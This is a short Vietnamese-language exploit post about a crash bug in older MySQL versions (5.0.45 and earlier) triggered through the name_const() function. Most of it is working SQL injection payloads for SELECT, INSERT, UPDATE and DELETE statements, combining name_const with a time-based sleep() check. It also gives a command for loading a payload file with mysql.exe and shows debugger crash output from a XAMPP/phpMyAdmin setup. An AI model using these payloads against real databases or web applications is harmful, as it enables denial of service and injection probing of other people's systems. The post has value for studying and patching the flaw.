Lỗ hổng gây crash cơ sở dữ liệu MySQL

Có một lỗi nhỏ được tìm thấy trong MySQL 5.0.45 với hàm name_const đã thử nghiệm trên môi trường Windows 8 có khả năng gây crash cơ sở dữ liệu MySQL. Trong các phiên bản cũ hơn hoặc tương đương 5.0.12 cũng xảy ra vấn đề tương tự. Tấn công hàm name_const() và nhận ra rằng khi thực hiện một statement trong một truy vấn phụ có thể khiến ứng dụng MySQL bị treo gây crash cơ sở dữ liệu. Khi chúng ta nhấn ^c (ctrl + C) hai lần sẽ nhận được thông báo lỗi.

Select

select 1 and 1=(select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a);

Insert

insert into users
values (20 ,'foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '','bar');

Update

update users
set password='foo' and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and '' where id=2;

Delete

delete from users
where id=2 and (select*from(select(name_const((select if ((select 1) = 1, sleep(5), null)),1)))a) and ''
Chúng ta cũng có thể crash cơ sở dữ liệu MySQL bằng cách đưa vào một file được lưu trữ cục bộ. Ví dụ:
mysql.exe –u root –p database_name payload.sql
Chi tiết từ trình debug: 2s eax=09a6ff18 ebx=00000000 ecx=a6630000 edx=00000000 esi=00000000 edi=fffffffe eip=75388172 esp=09a6fefc ebp=09a6ff84 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 KERNELBASE!PathCchAddExtension+0xeeb4: 75388172 897dfc mov dword ptr [ebp-4],edi ss:002b:09a6ff80=00000000 Khuyến cáo mục có thể khai thác: Error Code (0x40010005) starting at KERNELBASE!PathCchAddExtension+0x000000000000eeb4 (Hash=0xd874d776.0xeb23281d) Khi bạn thực hiện truy vấn trong phpmyadmin chạy XAMPP, bạn sẽ bị mất kết nối. Bạn sẽ phải khởi động lại máy chủ XAMPP. Bạn có thể gặp lại vấn đề này trong các phiên bản khác trừ phiên bản mới nhất bắt đầu từ 5.5.x